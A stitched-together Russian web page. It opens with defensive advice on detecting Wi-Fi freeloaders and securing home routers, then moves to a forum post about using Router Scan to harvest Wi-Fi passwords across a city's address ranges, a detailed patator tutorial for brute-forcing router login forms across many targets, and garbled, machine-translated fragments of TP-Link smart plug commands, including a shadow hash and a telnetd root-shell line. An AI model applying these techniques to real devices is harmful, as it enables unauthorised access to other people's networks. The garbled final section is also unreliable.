Как взломать роутер tp link: на роутере, от своего Wi-Fi. Стандартные пароли роутеров TP-Link

Как понять, что ваш Wi-Fi воруют? | Интернет | Блог

Wi-Fi-роутер сейчас есть практически везде, где есть Интернет. И провайдеры, и создатели роутеров, конечно, позаботились о безопасности устройств. Однако всегда есть шанс, что кто-то посторонний «присосется» к вашему Интернету. Чем это опасно и как предотвратить воровство — мы в подробностях расскажем в нашем материале.

Воровство Wi-Fi: чем это опасно?

Сейчас трудно встретить человека, который оставляет домашний Wi-Fi без пароля. Дело не сколько в безопасности, сколько в принципе «я плачу — я и пользуюсь». Однако действительно надежные пароли устанавливают не все. Например, в ходе недавнего исследования эксперты выявили самые популярные пароли. В их числе «12345678», «qwerty» и их комбинации. Естественно, все эти наборы актуальны и для роутеров. Так что взломать чей-то Wi-Fi иногда намного проще, чем кажется.

Насколько это критично? Здесь все зависит от целей вора. В лучшем случае недобросовестный сосед будет пользоваться вашим интернетом исключительно для серфинга в Сети или просмотра видео. Если у вас высокая скорость и мощный роутер, заметить такую «пиявку» даже не всегда получится. А вот если интернет медленный, то еще один пользователь определенно доставит хлопот: он будет отбирать часть вашего трафика.

Есть и более опасные ситуации. Ваш IP-адрес могут использовать для незаконной деятельности. Во всяком случае, с точки зрения силовиков. Например, ваш сосед — ярый любитель оставлять нелицеприятные комментарии в социальных сетях. Учитывая текущее законодательство, за это вполне можно получить административное или уголовное наказание. Проанализировав IP-адрес, специалисты провайдера могут определить абонента и его фактическое место проживания. И потом доказывай, что это все ваш сосед…

В худшем случае вы можете потерять данные авторизации к каким-либо аккаунтам. Причем это возможно даже при использовании защиты уровня WPA2 и HTTPS.  Конечно, для этого взломщику требуются определенные навыки и соответствующий софт.

Риск того, что ворующий у вас Wi-Fi сосед совершает целенаправленную атаку, невысок. Но в любом случае не стоит игнорировать предупреждения браузера о том, что вам не удалось получить защищенное соединение.

От воришек Wi-Fi лучше избавляться сразу, поскольку предугадать последствия их действий никогда нельзя.

Как определить вора Wi-Fi

Первыми симптомами воровства может стать падение скорости, например, при скачивании торрентов или работе iPTV. Например, при фактической  скорости 80 Мбит/с (10 Мбайт/с) и отключении всех других устройств от Wi-Fi у вас идет скачивание на уровне 5-8 Мбайт/с. Это хороший повод поискать, куда девается трафик. Конечно, эти проблемы могут быть вызваны сбоями у самого провайдера. Поэтому для окончательного ответа вам придется воспользоваться одним из представленных методов.

Веб-консоль роутера

Самый простой способ проверить все подключенные устройства — зайти в настройки самого роутера. Для этого вам потребуется открыть в браузере его веб-интерфейс (как правило, по адресу 192.168.0.1), заполнить логин/пароль. Эти данные имеются на этикетке самого маршрутизатора. Само собой, стандартный логин и пароль лучше сменить. Это первая мера по обеспечению безопасности вашего Wi-Fi.

Дальше необходимо найти список подключенных устройств. В TP-LINK, например, это можно сделать в блоке «Беспроводной режим» — «Статистика». Здесь отображаются гаджеты, подключенные по Wi-Fi. Главная проблема — низкая информативность, поскольку указаны лишь MAC-адреса.

MAC-адрес — это уникальный номер оборудования в сети. Вы можете его заскринить, после чего перейти в блок «DHCP» — «Список клиентов». Здесь уже можно поискать наименования подключенных устройств, в том числе проводных. Например, мы видим персональный компьютер и два смартфона (Redmi Note 7 и Mi9T Pro), а также нашу имитацию вора — Unknown.

В роутерах ASUS дополнительно показывается и тип соединения — проводное или беспроводное. Как правило, заодно определяется тип устройства (смартфон или ноутбук).

Остается только найти в списке гаджет, который не принадлежит вам. В худшем случае все подключенные устройства будут отображаться как Unknown (в том числе, собственные). Что делать в этом случае? Можно сравнивать MAC-адреса имеющихся гаджетов, выявив вора. Или же перейти к другим способам.

Узнать MAC-адрес своего смартфона обычно можно через настройки в разделе «Общие сведения».

Мобильные приложения

Можно попробовать найти вора прямо со своего смартфона. Например, для роутеров TP-LINK есть фирменное приложение Tether. С его помощью можно смотреть основные параметры роутера и делать некоторые базовые настройки. Для входа вам потребуется только знать логин и пароль от маршрутизатора.

Tether предлагает аналогичную информацию как и в веб-интерфейсе, просто в более удобной и понятной форме. Например, на вкладке «Клиенты» вы сразу можете посмотреть, кто подключен к роутеру.

Аналог такого приложения имеется и у ASUS. Это быстрый и удобный способ проверить Wi-Fi на наличие посторонних подключений.

Что делать, если для вашего роутера нет фирменного приложения? Скачайте сторонние программы! В Play Market имеется с десяток программ, созданных специально для анализа подключенных клиентов. Среди самых высоко оцененных — «Кто ворует мой Wi-Fi» и «Кто использует мой Wi-Fi». Такой софт позволяет получить информацию обо всех подключенных устройствах и другие полезные данные.

Приложения для компьютера и ноутбука

Мониторить сеть можно с помощью специализированных программ. Самая простая и общедоступная — Wireless Network Watcher. Функционал сводится к сканированию IP-адресов и выдачи результатов в таблице. Софт мониторит все подключения в режиме реального времени. Можно выставить звуковой сигнал, который сообщает о подключении/отключении какого-либо устройства. Как мы видим, модели телефонов программа определить не смогла, но установила устройство Unknown как гаджет от Xiaomi.

Альтернативный вариант — SoftPerfect WiFi Guard. После запуска программы достаточно выбрать сетевой адаптер и запустить сканирование. По сути, софт предлагает все те же возможности, но с дополнительными фишками. Например, вы сразу можете отметить проверенные устройства (зеленые). Все остальные не зарегистрированные устройства будут отображаться красным цветом. Дополнительно выводится время, затраченное на соединение. Косвенно это поможет определить, как далеко находится вор вашего Wi-Fi.

Рекомендуем воспользоваться веб-сервисом F-Secure Router Checker. Он не определяет количество и тип подключенных к роутеру устройств, но позволяет проверить перехват DNS-запросов. Злоумышленники могут через взлом роутера перенаправлять вас на фишинговые сайты, идентичные по дизайну официальным страницам. В итоге вы введете свой логин и пароль, даже не догадываясь об опасности. Если сервис определит проблему, значит, ваш маршрутизатор подвергся взлому. Тогда необходимо срочно сменить данные авторизации (или сделать сброс до заводских настроек).

Как отключить воришку от Wi-Fi

Избавиться от «нахлебников» можно разными способами. Лучше всего — через настройки роутера или фирменные приложения для смартфона.

В веб-интерфейсе вам необходимо найти блок «Защита» (или аналогичный) и выставить фильтрацию по MAC-адресам. Здесь есть два варианта.

• создать «белый список» — разрешить подключаться только тем устройствам, чей MAC-адрес имеется в таблице;
• создать «черный список» — запретить подключение гаджетам с указанными MAC-адресами.

Первый вариант предпочительнее: с ним не придется каждый раз «вылавливать» MAC-адрес вора. Но если вы захотите подключить новый гаджет к сети, придется отдельно прописывать разрешение в таблице. Аналогичный режим есть и у других роутеров.

Избавиться от нежелательных гаджетов можно в один клик через фирменные приложения. Например, уже в описанном  Tether.

Заблокировать нежелательные подключения позволяет и сторонний софт, например, Netcut или аналоги.

Потом остается только максимально обезопасить точку доступа.

• смените пароль и логин для авторизации в веб-интерфейс роутера;
• поставьте шифрование WPA2 Personal или новейший WPA3;
• отключите широковещательный SSID — так ваш Wi-Fi не будет появляться при общем сканировании;
• закройте доступ к веб-интерфейсу для всех устройств, кроме указанного;
• установите одну из программ для мониторинга сети с оповещением при подключении незарегистрированных устройств.

Выполнив все эти пункты, вы снизите до минимума шанс несанкционированной кражи вашего интернета и обезопасите себя от злоумышленников.

Как защитить роутер от взлома и несанкционированного доступа

Вопросу обеспечения защиты Вай-Фай роутера от взлома обычные рядовые пользователи уделяют мало внимания. И совершенно зря! Современный беспроводной маршрутизатор — это не просто устройство доступа, а целый мини-компьютер со своей операционной системой (как правило, на базе Linux). А этот факт уже накладывает определённый набор требований по безопасности, про которые обыватели обычно забывают, за что частенько получают набор неприятных «сюрпризов» начиная от навязчивой рекламы и заканчивая потерей личных данных. А ведь защитить Вай-Фай роутер от взлома совсем не сложно — достаточно просто соблюдать ряд требований и тогда несанкционированного доступа к устройству удастся избежать!

1. Пароль для входа в настройки роутера

Как показывает практика, пользователи ставят замудрёные пароли на компьютер, графические ключи на планшеты и телефоны, а вот про главное устройство доступа в сеть Интернет почему-то напрочь забывают, оставляя тот, что идёт изначально — admin, 1234 и т.п. Этим как раз и пользуются злоумышленники для входа в настройки роутера через Веб-конфигуратор или Telnet. Не так давно была массовая атака вируса Trojan.RBrute на абонентские модемы и маршрутизаторы, которая использовала эту брешь чтобы прописать в конфигурацию посторонние DNS-серверы. В итоге пользователи долго искали причину появления огромного количества навязчивой рекламы на своём компьютере или ноутбуке, а она скрывалась на роутере. Чтобы избежать всего этого геморроя, обычно достаточно просто поменять пароль для входа.

2. Устаревшая прошивка маршрутизатора

Как показывает статистика, на более чем 60% Вай-Фай роутеров используется устаревшее программное обеспечение. У трети из них имеются уязвимости, которые злоумышленники могут грамотно использовать для заражения вирусом или кражи данных. Производители стараются более-менее оперативно устранять эти прорехи и выкладывают свежие прошивки. Забывать про это не стоит и хотя бы раз в полгода нужно проверять наличие нового ПО и перепрошивать роутер. Сама процедура очень простая и на современных модемах и маршрутизаторах выполняется за несколько минут. Сначала Вам надо зайти в веб-интерфейс устройства и на статусной странице посмотреть текущую версию ПО (Firmware Version).

Потом перейдите на официальный сайт его производителя. В разделе поддержки пользователей поищите по модели самую последнюю версию прошивки и скачайте её.

Далее опять открываем веб-конфигуратор, заходим в «Системные настройки» и находим раздел «Обновление ПО» (Firware Update).

Нажимаем сначала на кнопку «Обзор»(Browse) для выбора файла с микропрограммой, а потом — на кнопку «Обновить»(Update). Через пару минут аппарат перезагрузится уже с новой прошивкой.

3. Неправильная настройка WiFi

Ещё одна популярная лазейка в безопасности маршрутизатора, которой так любят пользоваться малолетние «хакеры» чтобы взломать соседский роутер — это неправильная настройка беспроводной сети WiFi.  Во-первых, многие попросту делают её открытой, чтобы не мучиться с вводом пароля на подключаемых устройствах. Делать этого нельзя, так как любой желающий сможет подключиться к Вашей домашней сети. В лучшем случае злоумышленник будет просто загружать Ваш канал своим трафиком, а в худшем — сможет увести личные данные, фото и т.п. Обязательно делайте сетку закрытой с использованием стандарта безопасности WPA2-PSK и шифрованием AES!!!

Во-вторых, многие оставляют пароль на Вай-Фай таким, какой он был по-умолчанию. Таким образом, например, в 2014 году в Москве был зафиксирован массовый взлом GPON-терминалов ZTE. Обязательно меняйте ключ сети на свой собственный. Главное, чтобы он был не короче 8 символов и сложен в подборе.

В третьих, чтобы защитить свой WiFi роутер от взлома беспроводной сети обязательно, ещё раз повторю — обязательно отключайте в настройках функцию WPS. Несмотря на всё удобство, вреда она может принести больше, чем пользы. Именно эту брешь используют чтобы взломать запароленную сеть Вай-Фай.

Мне кажется, что мой роутер взломали — что делать?!

Если у Вас есть подозрения о том, что Вы стали жертвой взломщиков — стоит принять меры как можно быстрее. Начните с того, что проверьте актуальность программного обеспечения ( см. п.1 статьи). После этого необходимо с помощью кнопки «Reset» выполнить полный сброс настроек роутера к заводским параметрам. Этим Вы удалите все изменения в настройках, которые были внесены злоумышленниками.
После этого необходимо заново настроить его заново, принимая во внимание пункты 2 и 3 данной статьи.

Она поможет определить насколько безопасен и надёжен используемый Вами DNS-сервер и вовремя определить фейк.

Приведённые выше советы позволят Вам обезопасить себя и защитить свой роутер по максимуму от несанкционированного доступа и сетевых атак. Конечно, даже они не могут дать 100%-ную защиту от взлома, но большего для обычной домашней сети обычно и не требуется.

Kali linux взлом админки роутера • Вэб-шпаргалка для интернет предпринимателей!

Pirnazar

Well-known member

Между прочим, этот самый Router Scan от Stas’M — потрясающая штука! Мне же больше всего нравится в этой программе:

• сканирование, при котором показываются как роутеры, так и другие аппаратно-программные элементы (камеры, серверы и пр.)
• перебор типичный паролей для найденных роутеров
• использование эксплойтов для ряда роутеров
• если получилось подобрать пароль или сработал эксплойт, то парсится вся информация, которую удалось достать. А это, обычно, логин-пароль, пароль от Wi-Fi, данные локальной сети и т. д.

Программа уникальна тем, что, в лучших традициях графических интерфейсов, нужно нажать одну кнопку и она всё сделает сама. Никаких знаний не нужно.

Программа мне понравилась до такой степени, что я стал искать альтернативы для Linux. Альтернатив я не нашёл.
Но главная идея этой программы — сканировать сеть и искать роутеры с дефолтными паролями или со слабыми прошивками — мне показалась настолько потрясающей, что захотелось сделать что-то подобное для Linux. Это задача средней сложности, т. е. вполне достижимая. Благо большинство модулей уже есть готовые: nmap (для сканирования портов) + curl (для аутентификации и применения эксплойтов) + grep (для парсинга страниц аутентификации (при определении модели роутера) и парсинга паролей и прочих полезных вещей при удачном подборе пароля/применении эксплойта).

У меня даже получилось сделать рабочий концепт, который насобирал для меня за день более 1000 паролей Wi-Fi. Концепт получился жутко медленным: сканер написан на PHP, причём написан без каких либо оптимизаций — всё делается в один поток, да при этом сканер реализован на попытке установить сокетное соединение. Т.е. если соединение происходит — значит начинает пробовать стандартные пароли и вынимать информацию из роутера в случае успеха. Если соединение не происходит — то программа ждёт, пока пройдёт время по таймауту. Понятно, что чаще соединение не происходит и, как следствие, почти всё время программа ждём окончания таймаутов. Всё это можно ускорить и оптимизировать, добавить новые модели роутеров. В общем, если за лето будет достаточно времени, чтобы доделать (хоть на базе nmap, хоть на базе PHP) до уровня «не стыдно показать исходный код», то обязательно поделюсь своими наработками. Благо что алгоритмы эксплойтов, которые применяются в сканере роутеров от Stas’M, доступны в виде исходных текстов и их вполне можно переписать под curl.

Вернёмся к Router Scan от Stas’M. Он шикарный! С его помощью вы сами можете насобирать уйму паролей от роутеров, от сетей Wi-Fi и узнать много нового о сетях и об обитающих там устройствах.
Если вы пользователь Windows, то для вас всё совсем просто — скачиваете, запускаете, вводите диапазон адресов и ждёте окончания сканирования.

Для пользователей Linux также возможен запуск программы Router Scan от Stas’M под Wine. Я покажу как это сделать на примере Kali Linux.

Установка Wine в Kali Linux

Внимание, если у вас Kali 2.0, то перейдите к инструкции “Установка Wine в Kali Linux 2.0“.

Если посмотреть информацию о пакете Wine в Kali Linux, то там будет указано, что пакет уже установлен. Если попытаться его запустить, то выясниться, что это всего-навсего заглушка, которая и рассказывает как провести установку. Вся установка делается тремя командами:

), распаковываете (в любое место), кликаете правой кнопкой по файлу RouterScan.exe, в контекстном меню выбираете «Открыть с помощью Wine…», а дальше всё как на Windows.

Вот пример работы Router Scan от Stas’M в Linux (сканирую диапазоны адресов моего родного города Муром):

Только хорошие результаты:

Если кто-то не до конца уловил принципы работы программы:

• программе не нужен Wi-Fi приёмник или что-то ещё — она работает по проводному соединению;
• чтобы попытаться взломать соседский Wi-Fi (а не на другом конце света), то нужно знать IP соседа или, хотя бы, диапазон IP интернет-провайдера соседа. Можно воспользоваться

Где вместо ‘URL‘ введите адрес страницы на ipgeobase.ru, которую нужно пропарсить.

VALERY
23.07.2015 в 16:07
Вообще штука офигенная

ANGEL
30.08.2015 в 20:35
подскажите как установить на амд х64?

WEBWARE TEAM
31.08.2015 в 06:14
Разницы нет – точно также.

MR_YODA
31.08.2015 в 11:34
Большое спасибо за сайт! Все статьи очень интересные и познавательные. AdBlock выключил.

WEBWARE TEAM
31.08.2015 в 15:40
Спасибо, что не прошли мимо моей просьбы.

MOOGE
06.09.2015 в 19:45
В контекстном меню не появляется «Открыть с помощью Wine…». Что можете посоветовать? Все команды выполнил по инструкции.

WEBWARE TEAM
07.09.2015 в 06:29
Если у вас в контекстном меню не появился Wine, то сделайте так:
нажмите правой кнопкой на приложение, которое хотите запустить
выберите «Открыть в другой программе»
там где строка для ввода введите wine и нажмите кнопку «Установить по умолчанию», нажмите ОК. Теперь все .exe файлы будут открываться двойным кликом.
Про Wine в Kali 2.0 написал отдельно: Установка Wine в Kali Linux 2.0

MIAL
10.11.2015 в 07:21
Я заглянул в окно дома соседа и увидел у него большой плазменной телевизоре, ещё на столе я увидел телефон, а в комнате его жену и двух детей.

LAN
13.01.2016 в 08:01
Я тоже люблю С.Моэма…
Как прочекать кучу найденных IP камер на стандартные лог/пасы?

LAN
13.01.2016 в 07:50
Афтор сканера не планиурет добавлять брут камер по словарю. Можно ли самому запилить брут найденых в программе камер по внутреннему словарю. Лень прост поштучно вбивать каждый ip в Кали.

ИВАН
02.10.2016 в 11:12
Ребят, какой пароль на архив?

NOWASIVEM
06.12.2017 в 14:34
Запускаю RouterScan в Vine на WifiSlax, всё работает кроме вкладки по работе с Wifi в программе RouterScan. Помогите, что можно сделать, что бы работал Wifi в программе RouterScan под Vine.

ПЕТРУЧО
17.12.2017 в 06:05
“Афтор сканера не планиурет добавлять брут камер по словарю. Можно ли самому запилить брут найденых в программе камер по внутреннему словарю. Лень прост поштучно вбивать каждый ip в Кали.”
а ты 80й порт сканишь на камеры ? там вроде больше по сплойтам , а словать , так там файлик в роутерскане есть .
ЗЫ пароль на архив Stas’M Corp. емпни именно с точкой на конце

Этичный хакинг и тестирование на проникновение, информационная безопасность

Оглавление

Взлом страницы входа роутера

Чтобы иметь представления об HTTP аутентификации начнём с выдержки из справки Router Scan by Stas’M:

Формально можно разделить устройства на два типа — те, которые используют аутентификацию на уровне протокола HTTP, — и другие, которые её не используют — в их число входят устройства, использующие HTTP формы для авторизации.

Первый тип устройств довольно легко отличить от второго, открыв устройство в интернет браузере: у них в самом начале всегда появляется всплывающее окно с названием устройства и предложением ввести логин и пароль. Устройства второго типа не выдают подобного приглашения, а сразу открывают веб страницу, на которой также можно авторизоваться.

Но, если вы затрудняетесь визуально определить тип аутентификации, можно изучить HTTP заголовки ответа устройства, а конкретно заголовок WWW-Authenticate — именно он указывает на использование аутентификации на уровне протокола.

Для подбора пароля к таким устройствам Router Scan использует словари пар логин/пароль. Программой поддерживаются два метода аутентификации на уровне протокола:

• Basic — базовая аутентификация, имя пользователя и пароль обрабатываются обратимым шифром и отправляются в заголовках (подробнее).
• Digest — дайджест аутентификация, данные для входа необратимо хешируются алгоритмом MD5 и отправляются в заголовках (подробнее).

Для остальных устройств, не использующих эти методы, перебор по словарям не поддерживается (за исключением некоторых моделей, для которых была добавлена поддержка словаря Form аутентификации). Но можно воспользоваться функцией Use credentials в главном окне программы, которая проверяет пару логин/пароль независимо от метода аутентификации.

Итак, Router Scan использует брут-форс форм для авторизации на роутере не для всех моделей, в результате можно получить следующую картину:

Это несколько кучных подсетей в которых в избытке водится роутер ZTE F668. Скажу больше — почти во всех них стандартные логины и пароли, но ни Router Scan, ни RouterSploit не извлекает из них информацию, поскольку на роутере вход выполняется с помощью веб-формы, а для этой модели брут-форс не поддерживается.

Брут-форс веб-форм роутеров

Нам понадобится несколько инструментов. Первый из них — Burp Suite. По приведённой ссылке есть инструкции, в том числе для настройки работы Burp Suite с веб-браузерами — не будем здесь на этом останавливаться, выполните подготовительные действия самостоятельно.

Итак, открываем в веб-браузере интересующий нас роутер:

и убеждаемся, что Burp Suite действительно видит передаваемые данные:

Теперь отправляем заведомо неправильные данные, например, имя пользователя 11111111 и пароль 22222222:

Переходим к анализу в Burp Suite:

Данные отправляются методом POST, на страницу / (корневая папка) отправляется HTTP заголовок с кукиз Cookie: _TESTCOOKIESUPPORT=1, передаётся строка вида:

Смотрим ответ, для начала переключаемся на рендер:

Отлично, в ответе содержится слово Error, поищем его в сырых передаваемых данных:

Анализируем обычный ответ, без ввода пароля:

Там также встречается слово Error, то есть его наличие ни о чём не говорит — такой маркер не подходит для брут-форса. Надеюсь, самые внимательные заметили, что в ответе, пришедшем на аутентификацию, найдено два совпадения с Error, а в обычном ответе, только одно. Смотрим ещё раз ответ после попытки аутентификации:

В этом ответе содержится очень характерная строка:

Брут-форс роутеров

Для брутфорса я буду использовать программу patator. Чтобы вам было понятно, почему, прочитайте статью «Брут-форс веб-сайтов: инструкция по использованию patator, Hydra, Medusa». В этой же статье вы научитесь использовать patator для брут-форса веб-форм сайтов.

В общем виде, в самом простом случае, наша команда будет иметь следующий вид:

Теперь давайте заполним пробелы.

В качестве URL будет IP адрес роутера, например, 58.8.246.217, в качестве body нам нужно взять передаваемую строку, в нашем случае это frashnum=&action=login&Frm_Logintoken=0&Username=11111111&Password=22222222

И в ней в том месте, где имя пользователя, вставим FILE0, а вместо пароля вставим FILE1. В моём случае получилось: body=’frashnum=&action=login&Frm_Logintoken=0&Username=FILE0&Password=FILE1′

Теперь нам нужно указать путь до словарей. Словарь с именами пользователей у меня называется users.txt и расположен в той же папке, где я запускаю patator. Содержимое моего небольшого словаря:

Таким образом, я указываю имя словаря строкой 0=users.txt

Файл с паролями у меня называется passwords.txt, путь до него я указываю строкой 1=passwords.txt.

Содержимое моего файла passwords.txt:

Вспомним, что при отправке запроса также отправляется заголовок с куки _TESTCOOKIESUPPORT=1, поэтому к нашей команде мы добавляем header=’Cookie: _TESTCOOKIESUPPORT=1′.

Теперь нам нужно установить условие, по которому будет определяться, выполнен вход или нет. Этой строкой является «User information is error, please input again», поэтому для игнорирования ответов, содержащих указанную строку, мы запишем следующую опцию: -x ignore:fgrep=’User information is error’. Я немного сократил строку, так как точки и запятые у patator вызывают ошибки. Команда ignore говорит не сообщать о результатах, которые соответствуют следующему за двоеточием условию. Команда fgrep означает поиск строки в полученных данных. Для точного сообщения используется команда mesg, а для поиска по регулярному выражению есть команда egrep.

Собираем всё вместе:

Получаем такой результат:

Это странный результат, как будто бы почти все логины и пароли оказались верными.

Обратим внимание на строку с 302 Moved Temporarily. Она говорит о том, что при вводе учётных данных admin:password роутер хотел нас куда-то перенаправить. Видимо, это и есть правильные учётные данные (логинимся на роутере для проверки), а всё остальное это ложные срабатывания. Подумаем, как это могло получиться?

Получается, что по каким-то причинам роутер перестаёт отправлять строку «User information is error». Можно предположить, что после аутентификации, роутер запоминает наш IP и теперь все входы с этого адреса разрешены. Это можно проверить открыв в браузере страницу роутера. В моём случае это предположение не подтвердилось.

Самой вероятной причиной может быть защита от брутфорса. Попробуем быстро ввести несколько раз неправильные учётные данные. Точно:

Причина найдена, вместо строки «информация о пользователе это ошибка», нам показывают «You have input the wrong username or password for three times. Please try again a minute later», то есть «вы ввели имя пользователя или пароль неправильно три раза. Попробуйте снова через минуту».

Программа patator поддерживает одновременное использование нескольких опций -x и можно было бы добавить -x ignore:fgrep=’You have input the wrong username or password for three times’, но это не решает главную проблему: после трёх неправильных попыток нужно подождать 1 минуту. Для её исправления можно установить временной интервал между попытками в 1 минуту: —rate-limit=60

Но вспомним, что при вводе верных учётных данных происходит переадресация — сервер возвращает код 302:

Поэтому можно использовать конструкцию из двух опций: -x quit:code=302 и -x ignore:code=200. Перед двоеточием идёт команда, а затем условие, при котором выполняется эта команда. В первой строке quit означает выйти, как только получен код 302, то есть пароль найден и продолжать не нужно. Вторая команда ignore означает не показывать полученные данные при получении кода 200.

В результате получается команда:

Случайные величины в форме входа

Если сделать несколько попыток входа и изучить передаваемые данные, то можно заметить, что значение переменной Frm_Logintoken меняется.

Конкретная величина прописана в JavaScript коде:

И она меняется время от времени. Если передавать строку с неверно установленным токеном Frm_Logintoken, то роутер не примет даже правильный пароль. Это ещё одна защита от брутфорса. К счастью, patator имеет встроенный механизм обхода такой защиты.

Для этого используются опции before_urls и before_egrep. Опция before_urls указывает, какую страницу нужно загрузить до того, как будет сделана попытка аутентификации. А опция before_egrep ищет по заданному регулярному выражению в исходном коде страницы, полученной с помощью before_urls.

Для брут-форса исследуемого роутера нужно предварительно получить тот же адрес на котором вводятся данные, то есть before_urls=58.11.48.84.

Пример поиска по регулярному выражению: before_egrep=’_N1_:getObj(«Frm_Logintoken»).value = «(w+)»’

Здесь переменной _N1_ присваивается значение обратной ссылки — выражения в скобках. w+ обозначает главные составные символы, это синоним для «[_[:alnum:]]». Ещё раз — обратите внимание на скобки — это обратная ссылка. При этом в исходном фрагменте кода также присутствуют скобки — их нужно экранировать.

Также меняется передаваемая строка:

Теперь в ней используется _N1_ для присвоения значения параметру Logintoken.

Дополнительные примеры, в том числе для сразу двух величин, смотрите на странице https://kali.tools/?p=269.

Если роутер (или веб-приложение) устанавливает кукиз со случайным значением, то достаточно использовать before_urls в паре с accept_cookie=1 (принимать кукиз для последующей передачи).

Полная команда для брут-форса формы входа, с учётом всех нюансов исследуемой модели роутера, выглядит так:

Оптимизация брут-форса путём атаки сразу на несколько целей

Одна попытка в минуту это довольно медленно. Кстати, ведь в рассматриваемых условиях мы можем делать по три попытки в минуту, затем делать паузу. Не уверен, можно ли это сделать встроенным средствами patator.

Зато в patator есть очень полезный алгоритм, который используется по умолчанию при брут-форсе большого количества объектов. Можно запустить перебор учётных данных сразу на множестве роутеров. Для этого в качестве цели с опцией url укажите файл, например, url=FILE2, также укажите путь до самого файла: 2=routers_IP.txt. patator будет работать следующим образом: пробовать один логин:пароль на первом роутере, затем переходить ко второму роутеру и там пробовать один логин:пароль, затем к следующему, пока список не кончится. Когда список завершится, то patator зайдёт на второй круг и для первого роутера попробует вторую пару логин:пароль, затем перейдёт к следующему роутеру и так далее. В результате возникает естественная задержка между попытками ввода на одном роутере — пока делаются попытки входа на следующих в списке, каждому роутеру даётся время «передышки». Это позволяет значительно сократить значение —rate-limit или вовсе не использовать, так как если одновременно брут-форсятся десятки тысяч роутеров, то очередь до каждого роутера может доходить более чем через минуту. Номер файла имеет значение! То есть в начале полный круг проходится для файлов с номером . Это могут быть, например, имена пользователей. Если вы будете брать адреса роутеров для брут-форса из файла с номером , то patator будет атаковать только первый в списке роутер и перейдёт к следующему только тогда, когда закончатся логины и пароли для проверки.

tcpdump -i eth0 -n -l

 корень: 7KBNXuMnKTx6g: 15502: 0: 99999: 7 ::: 

shd: 32-битный исполняемый файл ELF MSB, MIPS, MIPS32 rel2 версии 1 (SYSV),
динамически связанный, интерпретатор /lib/ld-uClibc.so.0, поврежден размер заголовка раздела
 

 #!/бин/ш
если [$1 = обновить –o $1 = привязать]
потом
    ifconfig $interface $ip сетевая маска $subnet
    маршрут по умолчанию
    маршрут добавить по умолчанию gw $router
   echo "сервер имен $dns" > /tmp/resolv.conf
фи
 

/sbin/udhcpc –b –H «HS100(US)» –i br0 –s /tmp/udhcpc.сценарий
 

 HTTP/1.1 200 ОК
Сервер: Умная розетка TP-LINK
Подключение: закрыть
Длина содержимого: 5
Тип содержимого: текст/html

…
 

 {"система":{"get_sysinfo":{}}} 

 ./tplink_smartplug.py –t 192.168.0.1 –c информация 

 ./tplink_smartplug.py –t 192.168.0.1 –j '{"система":{"get_sysinfo":{}}}' 

 {"система":{"set_relay_state":{"состояние":1}}} 

 {"система":{"перезагрузка":{"задержка":1}}} 

 {"система":{"сброс":{"задержка":1}}} 

 {"система":{"download_firmware":{"url":"http://..."}}} 

 {"система":{"get_download_state":{}}} 

 {"система":{"flash_firmware":{}}} 

 {"netif":{"get_scaninfo":{"обновить":1}}} 

 {"netif":{"set_stainfo":{"ssid":"WiFi","пароль":"123","key_type":3}}} 

 {"cnCloud":{"set_server_url":{"сервер":"devs.tplinkcloud.com"}}} 

 {"cnCloud":{"bind":{"имя пользователя":[email protected], "пароль":"секрет"}}} 

 {"cnCloud":{"отвязать":null}} 

 LD_LIBRARY_PATH=/tmp
арпинг –I br0 –c 1 192.168.0.100
tftp –g 192.168.0.100 –r ap_bin/ap121/art.ko –l /tmp/art.ko
insmod /tmp/art.ko
tftp –g 192.168.0.100 –r ap_bin/ap121/nart.out –l /tmp/nart.из
chmod +x /tmp/nart.out
/tmp/nart.out – экземпляр 0 и
 

 /bin/busybox telnetd –l/bin/sh & 

 ./tplink-smarthome.py -t 192.168.0.1 -j '{"system":{"set_test_mode":{"enable":1}}}' 

 ./tplink-smarthome.py -t 192.168.0.1 -c перезагрузка 

 интерфейс=wlan0
драйвер = nl80211
ssid=hs_test
wpa=2
wpa_passphrase=12345670
канал=1
 

 md5(имя пользователя + пароль)[:16] 

 -- Пример кода Lua для запуска системной команды
-- и получить ответ построчно...

uidcmd = io.popen('id -u')
getuid = uidcmd:lines ()
если getuid() == '0', то
  print 'Вы root!'
конец

-- или просто...

если io.popen('id -u'):lines()() == '0', то напечатайте 'Вы root!' конец